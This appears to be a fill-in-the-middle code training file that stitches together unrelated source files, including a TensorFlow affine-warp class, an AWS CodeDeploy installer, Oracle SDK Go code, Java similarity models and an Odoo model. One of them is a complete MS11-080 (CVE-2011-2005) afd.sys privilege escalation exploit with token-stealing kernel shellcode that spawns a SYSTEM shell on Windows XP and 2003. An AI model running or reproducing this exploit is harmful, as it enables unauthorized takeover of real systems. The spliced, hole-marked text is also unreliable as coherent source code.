return base.Module(_affine_grid_warper_inverse, name=name)
class AffineWarpConstraints(object):
"""Affine warp contraints class.
`AffineWarpConstraints` allow for very succinct definitions of constraints on
the values of entries in affine transform matrices.
"""
def __init__(self, constraints=((None,) * 3,) * 2):
"""Creates a constraint definition for an affine transformation.
Args:
constraints: A doubly-nested iterable of shape `[N, N+1]` defining
constraints on the entries of a matrix that represents an affine
transformation in `N` dimensions. A numeric value bakes in a constraint
on the corresponding entry in the tranformation matrix, whereas `None`
implies that the corresponding entry will be specified at run time.
Raises:
TypeError: If `constraints` is not a nested iterable.
ValueError: If the double iterable `constraints` has inconsistent
dimensions.
"""
try:
self._constraints = tuple(tuple(x) for x in constraints)
except TypeError:
raise TypeError('constraints must be a nested iterable.')
# Number of rows
self._num_dim = len(self._constraints)
expected_num_cols = self._num_dim + 1
if any(len(x) != expected_num_cols for x in self._constraints):
raise ValueError('The input list must define a Nx(N+1) matrix of '
'contraints.')
def _calc_mask(self):
"""Computes a boolean mask from the user defined constraints."""
mask = []
for row in self._constraints:
mask.append(tuple(x is None for x in row))
return tuple(mask)
def _calc_num_free_params(self):
"""Computes number of non constrained parameters."""
return sum(row.count(None) for row in self._constraints)
@property
def num_free_params(self):
return self._calc_num_free_params()
@property
def mask(self):
return self._calc_mask()
@property
def constraints(self):
return self._constraints
@property
def num_dim(self):
return self._num_dim
def __getitem__(self, i):
"""Returns the list of constraints for the i-th row of the affine matrix."""
return self._constraints[i]
def _combine(self, x, y):
"""Combines two constraints, raising an error if they are not compatible."""
if x is None or y is None:
return x or y
if x != y:
raise ValueError('Incompatible set of constraints provided.')
return x
def __and__(self, rhs):
"""Combines two sets of constraints into a coherent single set."""
return self.combine_with(rhs)
def combine_with(self, additional_constraints):
"""Combines two sets of constraints into a coherent single set."""
x = additional_constraints
if not isinstance(additional_constraints, AffineWarpConstraints):
x = AffineWarpConstraints(additional_constraints)
new_constraints = []
for left, right in zip(self._constraints, x.constraints):
new_constraints.append([self._combine(x, y) for x, y in zip(left, right)])
return AffineWarpConstraints(new_constraints)
# Collection of utlities to initialize an AffineGridWarper in 2D and 3D.
@classmethod
def no_constraints(cls, num_dim=2):
"""Empty set of constraints for a num_dim-ensional affine transform."""
return cls(((None,) * (num_dim + 1),) * num_dim)
@classmethod
def translation_2d(cls, x=None, y=None):
"""Assign contraints on translation components of affine transform in 2d."""
return cls([[None, None, x],
[None, None, y]])
@classmethod
def translation_3d(cls, x=None, y=None, z=None):
"""Assign contraints on translation components of affine transform in 3d."""
return cls([[None, None, None, x],
[None, None, None, y],
[None, None, None, z]])
@classmethod
def scale_2d(cls, x=None, y=None):
"""Assigns contraints on scaling components of affine transform in 2d."""
return cls([[x, None, None],
[None, y, None]])
@classmethod
def scale_3d(cls, x=None, y=None, z=None):
"""Assigns contraints on scaling components of affine transform in 3d."""
return cls([[x, None, None, None],
[None, y, None, None],
[None, None, z, None]])
@classmethod
def shear_2d(cls, x=None, y=None):
"""Assigns contraints on shear components of affine transform in 2d."""
return cls([[None, x, None],
[y, None, None]])
@classmethod
def no_shear_2d(cls):
return cls.shear_2d(x=0, y=0)
@classmethod
def no_shear_3d(cls):
"""Assigns contraints on shear components of affine transform in 3d."""
return cls([[None, 0, 0, None],
[0, None, 0, None],
[0, 0, None, None]])<|fim▁end|>
|
if len(self._output_shape) > len(self._source_shape):
raise base.Error('Output domain dimensionality ({}) must be equal or '
|
<|file_name|>CVE-2011-2005.py<|end_file_name|><|fim▁begin|>################################################################################
######### MS11-080 - CVE-2011-2005 Afd.sys Privilege Escalation Exploit ########
######### Author: [email protected] - Matteo Memelli ########
######### Spaghetti & Pwnsauce ########
######### yuck! 0xbaadf00d Elwood@mac&cheese.com ########
######### ########
######### Thx to dookie(lifesaver)2000ca, dijital1 and ronin ########
######### for helping out! ########
######### ########
######### To my Master Shifu muts: ########
######### "So that's it, I just need inner peace?" ;) ########
######### ########
######### Exploit tested on the following 32bits systems: ########
######### Win XPSP3 Eng, Win 2K3SP2 Standard/Enterprise Eng ########
################################################################################
from ctypes import (windll, CDLL, Structure, byref, sizeof, POINTER,
c_char, c_short, c_ushort, c_int, c_uint, c_ulong,
c_void_p, c_long, c_char_p)
from ctypes.wintypes import HANDLE, DWORD
import socket, time, os, struct, sys
from optparse import OptionParser
usage = "%prog -O TARGET_OS"
parser = OptionParser(usage=usage)
parser.add_option("-O", "--target-os", type="string",
action="store", dest="target_os",
help="Target OS. Accepted values: XP, 2K3")
(options, args) = parser.parse_args()
OS = options.target_os
if not OS or OS.upper() not in ['XP','2K3']:
parser.print_help()
sys.exit()
OS = OS.upper()
kernel32 = windll.kernel32
ntdll = windll.ntdll
Psapi = windll.Psapi
def findSysBase(drvname=None):
ARRAY_SIZE = 1024
myarray = c_ulong * ARRAY_SIZE
lpImageBase = myarray()
cb = c_int(1024)
lpcbNeeded = c_long()
drivername_size = c_long()
drivername_size.value = 48
Psapi.EnumDeviceDrivers(byref(lpImageBase), cb, byref(lpcbNeeded))
for baseaddy in lpImageBase:
drivername = c_char_p("\x00"*drivername_size.value)
if baseaddy:
Psapi.GetDeviceDriverBaseNameA(baseaddy, drivername,
drivername_size.value)
if drvname:
if drivername.value.lower() == drvname:
print "[+] Retrieving %s info..." % drvname
print "[+] %s base address: %s" % (drvname, hex(baseaddy))
return baseaddy
else:
if drivername.value.lower().find("krnl") !=-1:
print "[+] Retrieving Kernel info..."
print "[+] Kernel version:", drivername.value
print "[+] Kernel base address: %s" % hex(baseaddy)
return (baseaddy, drivername.value)
return None
print "[>] MS11-080 Privilege Escalation Exploit"
print "[>] Matteo Memelli - [email protected]"
print "[>] Release Date 28/11/2011"
WSAGetLastError = windll.Ws2_32.WSAGetLastError
WSAGetLastError.argtypes = ()
WSAGetLastError.restype = c_int
SOCKET = c_int
WSASocket = windll.Ws2_32.WSASocketA
WSASocket.argtypes = (c_int, c_int, c_int, c_void_p, c_uint, DWORD)
WSASocket.restype = SOCKET
closesocket = windll.Ws2_32.closesocket
closesocket.argtypes = (SOCKET,)
closesocket.restype = c_int
connect = windll.Ws2_32.connect
connect.argtypes = (SOCKET, c_void_p, c_int)
connect.restype = c_int
class sockaddr_in(Structure):
_fields_ = [
("sin_family", c_short),
("sin_port", c_ushort),
("sin_addr", c_ulong),
("sin_zero", c_char * 8),
]
## Create our deviceiocontrol socket handle
client = WSASocket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP,
None, 0, 0)
if client == ~0:
raise OSError, "WSASocket: %s" % (WSAGetLastError(),)
try:
addr = sockaddr_in()
addr.sin_family = socket.AF_INET
addr.sin_port = socket.htons(4455)
addr.sin_addr = socket.htonl(0x7f000001) # 127.0.0.1
## We need to connect to a closed port, socket state must be CONNECTING
connect(client, byref(addr), sizeof(addr))
except:
closesocket(client)
raise
baseadd = c_int(0x1001)
MEMRES = (0x1000 | 0x2000)
PAGEEXE = 0x00000040
Zerobits = c_int(0)
RegionSize = c_int(0x1000)
written = c_int(0)
## This will trigger the path to AfdRestartJoin
irpstuff = ("\x41\x41\x41\x41\x42\x42\x42\x42"
"\x00\x00\x00\x00\x44\x44\x44\x44"
"\x01\x00\x00\x00"
"\xe8\x00" + "4" + "\xf0\x00" + "\x45"*231)
## Allocate space for the input buffer
dwStatus = ntdll.NtAllocateVirtualMemory(-1,
byref(baseadd),
0x0,
byref(RegionSize),
MEMRES,
PAGEEXE)
# Copy input buffer to it
kernel32.WriteProcessMemory(-1, 0x1000, irpstuff, 0x100, byref(written))
startPage = c_int(0x00020000)
kernel32.VirtualProtect(startPage, 0x1000, PAGEEXE, byref(written))
################################# KERNEL INFO ##################################
lpDriver = c_char_p()
lpPath = c_char_p()
lpDrvAddress = c_long()
(krnlbase, kernelver) = findSysBase()
hKernel = kernel32.LoadLibraryExA(kernelver, 0, 1)
HalDispatchTable = kernel32.GetProcAddress(hKernel, "HalDispatchTable")
HalDispatchTable -= hKernel
HalDispatchTable += krnlbase
print "[+] HalDispatchTable address:", hex(HalDispatchTable)
halbase = findSysBase("hal.dll")
## WinXP SP3
if OS == "XP":
HaliQuerySystemInformation = halbase+0x16bba # Offset for XPSP3
HalpSetSystemInformation = halbase+0x19436 # Offset for XPSP3
## Win2k3 SP2
else:
HaliQuerySystemInformation = halbase+0x1fa1e # Offset for WIN2K3
HalpSetSystemInformation = halbase+0x21c60 # Offset for WIN2K3
print "[+] HaliQuerySystemInformation address:", hex(HaliQuerySystemInformation)
print "[+] HalpSetSystemInformation address:", hex(HalpSetSystemInformation)
################################# EXPLOITATION #################################
shellcode_address_dep = 0x0002071e
shellcode_address_nodep = 0x000207b8
padding = "\x90"*2
HalDispatchTable0x4 = HalDispatchTable + 0x4
HalDispatchTable0x8 = HalDispatchTable + 0x8
## tokenbkaddr = 0x00020900
if OS == "XP":
_KPROCESS = "\x44"
_TOKEN = "\xc8"
<|fim▁hole|> _TOKEN = "\xd8"
_UPID = "\x94"
_APLINKS = "\x98"
restore_ptrs = "\x31\xc0" + \
"\xb8" + struct.pack("L", HalpSetSystemInformation) + \
"\xa3" + struct.pack("L", HalDispatchTable0x8) + \
"\xb8" + struct.pack("L", HaliQuerySystemInformation) + \
"\xa3" + struct.pack("L", HalDispatchTable0x4)
tokenstealing = "\x52" +\
"\x53" +\
"\x33\xc0" +\
"\x64\x8b\x80\x24\x01\x00\x00" +\
"\x8b\x40" + _KPROCESS +\
"\x8b\xc8" +\
"\x8b\x98" + _TOKEN + "\x00\x00\x00" +\
"\x89\x1d\x00\x09\x02\x00" +\
"\x8b\x80" + _APLINKS + "\x00\x00\x00" +\
"\x81\xe8" + _APLINKS + "\x00\x00\x00" +\
"\x81\xb8" + _UPID + "\x00\x00\x00\x04\x00\x00\x00" +\
"\x75\xe8" +\
"\x8b\x90" + _TOKEN + "\x00\x00\x00" +\
"\x8b\xc1" +\
"\x89\x90" + _TOKEN + "\x00\x00\x00" +\
"\x5b" +\
"\x5a" +\
"\xc2\x10"
restore_token = "\x52" +\
"\x33\xc0" +\
"\x64\x8b\x80\x24\x01\x00\x00" +\
"\x8b\x40" + _KPROCESS +\
"\x8b\x15\x00\x09\x02\x00" +\
"\x89\x90" + _TOKEN + "\x00\x00\x00" +\
"\x5a" +\
"\xc2\x10"
shellcode = padding + restore_ptrs + tokenstealing
shellcode_size = len(shellcode)
orig_size = shellcode_size
# Write shellcode in userspace (dep)
kernel32.WriteProcessMemory(-1, shellcode_address_dep, shellcode,
shellcode_size, byref(written))
# Write shellcode in userspace *(nodep)
kernel32.WriteProcessMemory(-1, shellcode_address_nodep, shellcode,
shellcode_size, byref(written))
## Trigger Pointer Overwrite
print "[*] Triggering AFDJoinLeaf pointer overwrite..."
IOCTL = 0x000120bb # AFDJoinLeaf
inputbuffer = 0x1004
inputbuffer_size = 0x108
outputbuffer_size = 0x0 # Bypass Probe for Write
outputbuffer = HalDispatchTable0x4 + 0x1 # HalDispatchTable+0x4+1
IoStatusBlock = c_ulong()
NTSTATUS = ntdll.ZwDeviceIoControlFile(client,
None,
None,
None,
byref(IoStatusBlock),
IOCTL,
inputbuffer,
inputbuffer_size,
outputbuffer,
outputbuffer_size
)
## Trigger shellcode
inp = c_ulong()
out = c_ulong()
inp = 0x1337
hola = ntdll.NtQueryIntervalProfile(inp, byref(out))
## Spawn a system shell, w00t!
print "[*] Spawning a SYSTEM shell..."
os.system("cmd.exe /T:C0 /K cd c:\\windows\\system32")
############################## POST EXPLOITATION ###############################
print "[*] Restoring token..."
## Restore the thingie
shellcode = padding + restore_ptrs + restore_token
shellcode_size = len(shellcode)
trail_padding = (orig_size - shellcode_size) * "\x00"
shellcode += trail_padding
shellcode_size += (orig_size - shellcode_size)
## Write restore shellcode in userspace (dep)
kernel32.WriteProcessMemory(-1, shellcode_address_dep, shellcode,
shellcode_size, byref(written))
## Write restore shellcode in userspace (nodep)
kernel32.WriteProcessMemory(-1, shellcode_address_nodep, shellcode,
shellcode_size, byref(written))
## Overwrite HalDispatchTable once again
NTSTATUS = ntdll.ZwDeviceIoControlFile(client,
None,
None,
None,
byref(IoStatusBlock),
IOCTL,
inputbuffer,
inputbuffer_size,
outputbuffer,
outputbuffer_size
)
## Trigger restore shellcode
hola = ntdll.NtQueryIntervalProfile(inp, byref(out))
print "[+] Restore done! Have a nice day :)"<|fim▁end|>
|
_UPID = "\x84"
_APLINKS = "\x88"
else:
_KPROCESS = "\x38"
|
<|file_name|>systems.py<|end_file_name|><|fim▁begin|># Copyright 2015 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
import ctypes
import os
import subprocess
DEFAULT_CONFIG_FILE = 'codedeploy.onpremises.yml'
class System:
UNSUPPORTED_SYSTEM_MSG = (
'Only Ubuntu Server, Red Hat Enterprise Linux Server and '
'Windows Server operating systems are supported.'
)
def __init__(self, params):
self.session = params.session
self.s3 = self.session.create_client(
's3',
region_name=params.region
)
def validate_administrator(self):
raise NotImplementedError('validate_administrator')
def install(self, params):
raise NotImplementedError('install')
def uninstall(self, params):
raise NotImplementedError('uninstall')
class Windows(System):
CONFIG_DIR = r'C:\ProgramData\Amazon\CodeDeploy'
CONFIG_FILE = 'conf.onpremises.yml'
CONFIG_PATH = r'{0}\{1}'.format(CONFIG_DIR, CONFIG_FILE)
INSTALLER = 'codedeploy-agent.msi'
def validate_administrator(self):
if not ctypes.windll.shell32.IsUserAnAdmin():
raise RuntimeError(
'You must run this command as an Administrator.'
)
def install(self, params):
if 'installer' in params:
self.INSTALLER = params.installer
process = subprocess.Popen(
[
'powershell.exe',
'-Command', 'Stop-Service',
'-Name', 'codedeployagent'
],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE
)
(output, error) = process.communicate()
not_found = (
"Cannot find any service with service name 'codedeployagent'"
)
if process.returncode != 0 and not_found not in error:
raise RuntimeError(
'Failed to stop the AWS CodeDeploy Agent:\n{0}'.format(error)
)
response = self.s3.get_object(Bucket=params.bucket, Key=params.key)
with open(self.INSTALLER, 'wb') as f:
f.write(response['Body'].read())
subprocess.check_call(
[
r'.\{0}'.format(self.INSTALLER),
'/quiet',
'/l', r'.\codedeploy-agent-install-log.txt'
],
shell=True
)
subprocess.check_call([
'powershell.exe',
'-Command', 'Restart-Service',
'-Name', 'codedeployagent'
])
process = subprocess.Popen(
[
'powershell.exe',
'-Command', 'Get-Service',
'-Name', 'codedeployagent'
],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE
)
(output, error) = process.communicate()
if "Running" not in output:
raise RuntimeError(
'The AWS CodeDeploy Agent did not start after installation.'
)
def uninstall(self, params):
process = subprocess.Popen(
[
'powershell.exe',
'-Command', 'Stop-Service',
'-Name', 'codedeployagent'
],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE
)
(output, error) = process.communicate()
not_found = (
"Cannot find any service with service name 'codedeployagent'"
)
if process.returncode == 0:
self._remove_agent()
elif not_found not in error:
raise RuntimeError(
'Failed to stop the AWS CodeDeploy Agent:\n{0}'.format(error)
)
def _remove_agent(self):
process = subprocess.Popen(
[
'wmic',
'product', 'where', 'name="CodeDeploy Host Agent"',
'call', 'uninstall', '/nointeractive'
],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE
)
(output, error) = process.communicate()
if process.returncode != 0:
raise RuntimeError(
'Failed to uninstall the AWS CodeDeploy Agent:\n{0}'.format(
error
)
)
class Linux(System):
CONFIG_DIR = '/etc/codedeploy-agent/conf'
CONFIG_FILE = DEFAULT_CONFIG_FILE
CONFIG_PATH = '{0}/{1}'.format(CONFIG_DIR, CONFIG_FILE)
INSTALLER = 'install'
def validate_administrator(self):
if os.geteuid() != 0:
raise RuntimeError('You must run this command as sudo.')
def install(self, params):
if 'installer' in params:
self.INSTALLER = params.installer
self._update_system(params)
self._stop_agent(params)
response = self.s3.get_object(Bucket=params.bucket, Key=params.key)
with open(self.INSTALLER, 'wb') as f:
f.write(response['Body'].read())
subprocess.check_call(
['chmod', '+x', './{0}'.format(self.INSTALLER)]
)
credentials = self.session.get_credentials()
environment = os.environ.copy()
environment['AWS_REGION'] = params.region
environment['AWS_ACCESS_KEY_ID'] = credentials.access_key
environment['AWS_SECRET_ACCESS_KEY'] = credentials.secret_key
if credentials.token is not None:
environment['AWS_SESSION_TOKEN'] = credentials.token
subprocess.check_call(
['./{0}'.format(self.INSTALLER), 'auto'],
env=environment<|fim▁hole|> def uninstall(self, params):
process = self._stop_agent(params)
if process.returncode == 0:
self._remove_agent(params)
def _update_system(self, params):
raise NotImplementedError('preinstall')
def _remove_agent(self, params):
raise NotImplementedError('remove_agent')
def _stop_agent(self, params):
process = subprocess.Popen(
['service', 'codedeploy-agent', 'stop'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE
)
(output, error) = process.communicate()
if process.returncode != 0 and params.not_found_msg not in error:
raise RuntimeError(
'Failed to stop the AWS CodeDeploy Agent:\n{0}'.format(error)
)
return process
class Ubuntu(Linux):
def _update_system(self, params):
subprocess.check_call(['apt-get', '-y', 'update'])
subprocess.check_call(['apt-get', '-y', 'install', 'ruby2.0'])
def _remove_agent(self, params):
subprocess.check_call(['dpkg', '-r', 'codedeploy-agent'])
def _stop_agent(self, params):
params.not_found_msg = 'codedeploy-agent: unrecognized service'
return Linux._stop_agent(self, params)
class RHEL(Linux):
def _update_system(self, params):
subprocess.check_call(['yum', '-y', 'install', 'ruby'])
def _remove_agent(self, params):
subprocess.check_call(['yum', '-y', 'erase', 'codedeploy-agent'])
def _stop_agent(self, params):
params.not_found_msg = 'Redirecting to /bin/systemctl stop codedeploy-agent.service'
return Linux._stop_agent(self, params)<|fim▁end|>
|
)
|
<|file_name|>index.test-d.ts<|end_file_name|><|fim▁begin|>import http from 'node:http';
import {expectType} from 'tsd';
import decompressResponse, {UncompressedIncomingMessage} from './index.js';
http.get('localhost', response => {
expectType<UncompressedIncomingMessage>(decompressResponse(response));<|fim▁hole|><|fim▁end|>
|
});
|
<|file_name|>get_autonomous_patch_request_response.go<|end_file_name|><|fim▁begin|><|fim▁hole|>package database
import (
"github.com/oracle/oci-go-sdk/v46/common"
"net/http"
)
// GetAutonomousPatchRequest wrapper for the GetAutonomousPatch operation
//
// See also
//
// Click https://docs.cloud.oracle.com/en-us/iaas/tools/go-sdk-examples/latest/database/GetAutonomousPatch.go.html to see an example of how to use GetAutonomousPatchRequest.
type GetAutonomousPatchRequest struct {
// The autonomous patch OCID (https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm).
AutonomousPatchId *string `mandatory:"true" contributesTo:"path" name:"autonomousPatchId"`
// Unique Oracle-assigned identifier for the request.
// If you need to contact Oracle about a particular request, please provide the request ID.
OpcRequestId *string `mandatory:"false" contributesTo:"header" name:"opc-request-id"`
// Metadata about the request. This information will not be transmitted to the service, but
// represents information that the SDK will consume to drive retry behavior.
RequestMetadata common.RequestMetadata
}
func (request GetAutonomousPatchRequest) String() string {
return common.PointerString(request)
}
// HTTPRequest implements the OCIRequest interface
func (request GetAutonomousPatchRequest) HTTPRequest(method, path string, binaryRequestBody *common.OCIReadSeekCloser, extraHeaders map[string]string) (http.Request, error) {
return common.MakeDefaultHTTPRequestWithTaggedStructAndExtraHeaders(method, path, request, extraHeaders)
}
// BinaryRequestBody implements the OCIRequest interface
func (request GetAutonomousPatchRequest) BinaryRequestBody() (*common.OCIReadSeekCloser, bool) {
return nil, false
}
// RetryPolicy implements the OCIRetryableRequest interface. This retrieves the specified retry policy.
func (request GetAutonomousPatchRequest) RetryPolicy() *common.RetryPolicy {
return request.RequestMetadata.RetryPolicy
}
// GetAutonomousPatchResponse wrapper for the GetAutonomousPatch operation
type GetAutonomousPatchResponse struct {
// The underlying http response
RawResponse *http.Response
// The AutonomousPatch instance
AutonomousPatch `presentIn:"body"`
// For optimistic concurrency control. See `if-match`.
Etag *string `presentIn:"header" name:"etag"`
// Unique Oracle-assigned identifier for the request. If you contact Oracle about
// a particular request, then you must provide the request ID.
OpcRequestId *string `presentIn:"header" name:"opc-request-id"`
}
func (response GetAutonomousPatchResponse) String() string {
return common.PointerString(response)
}
// HTTPResponse implements the OCIResponse interface
func (response GetAutonomousPatchResponse) HTTPResponse() *http.Response {
return response.RawResponse
}<|fim▁end|>
|
// Copyright (c) 2016, 2018, 2021, Oracle and/or its affiliates. All rights reserved.
// This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
// Code generated. DO NOT EDIT.
|
<|file_name|>Nikon_D7000.py<|end_file_name|><|fim▁begin|>import bpy
bpy.context.object.data.sensor_width = 23.6
bpy.context.object.data.sensor_height = 15.6<|fim▁hole|>bpy.context.object.data.sensor_fit = 'HORIZONTAL'<|fim▁end|>
| |
<|file_name|>BagModel.java<|end_file_name|><|fim▁begin|>/*
* Copyright [2016-2020] [George Papadakis ([email protected])]
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.scify.jedai.textmodels;
import org.scify.jedai.utilities.enumerations.RepresentationModel;
import org.scify.jedai.utilities.enumerations.SimilarityMetric;
import gnu.trove.iterator.TObjectIntIterator;
import gnu.trove.map.TObjectIntMap;
import gnu.trove.map.hash.TObjectIntHashMap;
import java.util.HashSet;
import java.util.Set;
/**
*
* @author G.A.P. II
*/
public abstract class BagModel extends AbstractModel {
protected float noOfTotalTerms;
protected final TObjectIntMap<String> itemsFrequency;
public BagModel(int dId, int n, RepresentationModel md, SimilarityMetric sMetric, String iName) {
super(dId, n, md, sMetric, iName);
itemsFrequency = new TObjectIntHashMap<>();
}
@Override
public void finalizeModel() {
}
protected float getEnhancedJaccardSimilarity(BagModel oModel) {
TObjectIntMap<String> itemVector1 = itemsFrequency;
TObjectIntMap<String> itemVector2 = oModel.getItemsFrequency();
if (itemVector2.size() < itemVector1.size()) {
itemVector1 = oModel.getItemsFrequency();
itemVector2 = itemsFrequency;
}
float numerator = 0.0f;
for (TObjectIntIterator<String> iterator = itemVector1.iterator(); iterator.hasNext();) {
iterator.advance();
numerator += Math.min(iterator.value(), itemVector2.get(iterator.key()));
}
float denominator = noOfTotalTerms + oModel.getNoOfTotalTerms() - numerator;
return numerator / denominator;
}
@Override
public float getEntropy(boolean normalized) {
float entropy = 0.0f;
for (TObjectIntIterator<String> iterator = itemsFrequency.iterator(); iterator.hasNext();) {
iterator.advance();
float p_i = (iterator.value() / noOfTotalTerms);
entropy -= (p_i * (Math.log10(p_i) / Math.log10(2.0d)));
}
if (normalized) {
float maxEntropy = (float) Math.log10(noOfTotalTerms) / (float) Math.log10(2.0f);
return entropy / maxEntropy;
}
return entropy;
}
public TObjectIntMap<String> getItemsFrequency() {
return itemsFrequency;
}
protected float getJaccardSimilarity(BagModel oModel) {
final Set<String> commonKeys = new HashSet<>(itemsFrequency.keySet());
commonKeys.retainAll(oModel.getItemsFrequency().keySet());
float numerator = commonKeys.size();
float denominator = itemsFrequency.size() + oModel.getItemsFrequency().size() - numerator;
return numerator / denominator;
}
<|fim▁hole|> }
@Override
public Set<String> getSignatures() {
return itemsFrequency.keySet();
}
@Override
public float getSimilarity(ITextModel oModel) {
switch (simMetric) {
case COSINE_SIMILARITY:
return getTfCosineSimilarity((BagModel) oModel);
case ENHANCED_JACCARD_SIMILARITY:
return getEnhancedJaccardSimilarity((BagModel) oModel);
case GENERALIZED_JACCARD_SIMILARITY:
return getTfGeneralizedJaccardSimilarity((BagModel) oModel);
case JACCARD_SIMILARITY:
return getJaccardSimilarity((BagModel) oModel);
default:
throw new IllegalStateException(
"The given similarity metric is incompatible with the bag representation model.");
}
}
protected float getTfCosineSimilarity(BagModel oModel) {
float totalTerms2 = oModel.getNoOfTotalTerms();
TObjectIntMap<String> itemVector1 = itemsFrequency;
TObjectIntMap<String> itemVector2 = oModel.getItemsFrequency();
if (itemVector2.size() < itemVector1.size()) {
itemVector1 = oModel.getItemsFrequency();
itemVector2 = itemsFrequency;
}
float numerator = 0.0f;
for (TObjectIntIterator<String> iterator = itemVector1.iterator(); iterator.hasNext();) {
iterator.advance();
numerator += iterator.value() * itemVector2.get(iterator.key()) / noOfTotalTerms / totalTerms2;
}
float denominator = getVectorMagnitude() * oModel.getVectorMagnitude();
return numerator / denominator;
}
protected float getTfGeneralizedJaccardSimilarity(BagModel oModel) {
float totalTerms1 = noOfTotalTerms;
float totalTerms2 = oModel.getNoOfTotalTerms();
TObjectIntMap<String> itemVector1 = itemsFrequency;
TObjectIntMap<String> itemVector2 = oModel.getItemsFrequency();
if (itemVector2.size() < itemVector1.size()) {
itemVector1 = oModel.getItemsFrequency();
itemVector2 = itemsFrequency;
totalTerms1 = oModel.getNoOfTotalTerms();
totalTerms2 = noOfTotalTerms;
}
float numerator = 0.0f;
for (TObjectIntIterator<String> iterator = itemVector1.iterator(); iterator.hasNext(); ) {
iterator.advance();
numerator += Math.min(iterator.value() / totalTerms1, itemVector2.get(iterator.key()) / totalTerms2);
}
final Set<String> allKeys = new HashSet<>(itemVector1.keySet());
allKeys.addAll(itemVector2.keySet());
float denominator = 0.0f;
for (String key : allKeys) {
denominator += Math.max(itemVector1.get(key) / totalTerms1, itemVector2.get(key) / totalTerms2);
}
return numerator / denominator;
}
protected float getVectorMagnitude() {
float magnitude = 0.0f;
for (TObjectIntIterator<String> iterator = itemsFrequency.iterator(); iterator.hasNext();) {
iterator.advance();
magnitude += Math.pow(iterator.value() / noOfTotalTerms, 2.0);
}
return (float) Math.sqrt(magnitude);
}
}<|fim▁end|>
|
protected float getNoOfTotalTerms() {
return noOfTotalTerms;
|
<|file_name|>stock_picking.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
from odoo import models, api, fields<|fim▁hole|>from odoo.tools.translate import _
class StockPicking(models.Model):
_inherit = 'stock.picking'
website_id = fields.Many2one('website', related='sale_id.website_id', string='Website',
help='Website this picking belongs to.',
store=True, readonly=True)<|fim▁end|>
| |
<|file_name|>main.go<|end_file_name|><|fim▁begin|>// Try CodeIQ Q3264
// author: Leonardone @ NEETSDKASU
package main
import (
"fmt"
"strings"
)
func Solve(target string, words []string) (ans []string) {
for _, w := range words {
switch {
case w == target:
ans = append(ans, "["+w+"]")
case strings.Contains(w, target):
ans = append(ans, strings.Replace(w, target, "="+target+"=", -1))
default:
ans = append(ans, w)
}
}
return
}
func main() {
var target string
fmt.Scan(&target)
words := make([]string, 0, 100)
for {
var w string
if _, err := fmt.Scan(&w); err != nil {
break
}
words = append(words, w)
}
ans := Solve(target, words)
for i, w := range ans {
if i > 0 {<|fim▁hole|> fmt.Print(w)
}
fmt.Println()
}<|fim▁end|>
|
fmt.Print(" ")
}
|
<|file_name|>setup.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python<|fim▁hole|>from setuptools import setup, find_packages
with open('README.rst') as readme_file:
README = readme_file.read()
with open('HISTORY.rst') as history_file:
HISTORY = history_file.read()
REQUIREMENTS = [
'gitpython',
'requests',
'tqdm',
'requests_cache',
]
TEST_REQUIREMENTS = [
'pytest',
'mock',
]
setup(
name='packyou',
version='0.1.6',
description="Downloads or clones a python project from github and allows to import it from anywhere. Very useful when the repo is not a package",
long_description=README + '\n\n' + HISTORY,
author="Leonardo Lazzaro",
author_email='[email protected]',
url='https://github.com/llazzaro/packyou',
packages=find_packages(),
package_dir={'packyou':
'packyou'},
include_package_data=True,
install_requires=REQUIREMENTS,
license="MIT license",
zip_safe=False,
keywords='packyou',
classifiers=[
'Development Status :: 2 - Pre-Alpha',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Natural Language :: English',
"Programming Language :: Python :: 2",
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
],
test_suite='tests',
tests_require=TEST_REQUIREMENTS,
)<|fim▁end|>
|
# -*- coding: utf-8 -*-
|
<|file_name|>ABsgCoachWebPage.java<|end_file_name|><|fim▁begin|>package com.bsgcoach.web;
import javax.annotation.concurrent.NotThreadSafe;
import org.apache.wicket.Page;
import org.apache.wicket.markup.head.CssHeaderItem;
import org.apache.wicket.markup.head.IHeaderResponse;
import org.apache.wicket.markup.head.JavaScriptHeaderItem;
import org.apache.wicket.model.IModel;
import org.apache.wicket.model.Model;<|fim▁hole|>import org.apache.wicket.request.cycle.RequestCycle;
import org.apache.wicket.request.resource.PackageResourceReference;
import org.apache.wicket.request.resource.ResourceReference;
import com.bsgcoach.web.footer.FooterPanel;
import com.bsgcoach.web.guide.RedirectToGuidePage;
import de.agilecoders.wicket.core.markup.html.bootstrap.image.GlyphIconType;
import de.agilecoders.wicket.core.markup.html.bootstrap.navbar.Navbar;
import de.agilecoders.wicket.core.markup.html.bootstrap.navbar.NavbarButton;
import de.agilecoders.wicket.core.markup.html.bootstrap.navbar.NavbarComponents;
import de.agilecoders.wicket.core.markup.html.bootstrap.navbar.NavbarExternalLink;
import de.invesdwin.nowicket.application.AWebPage;
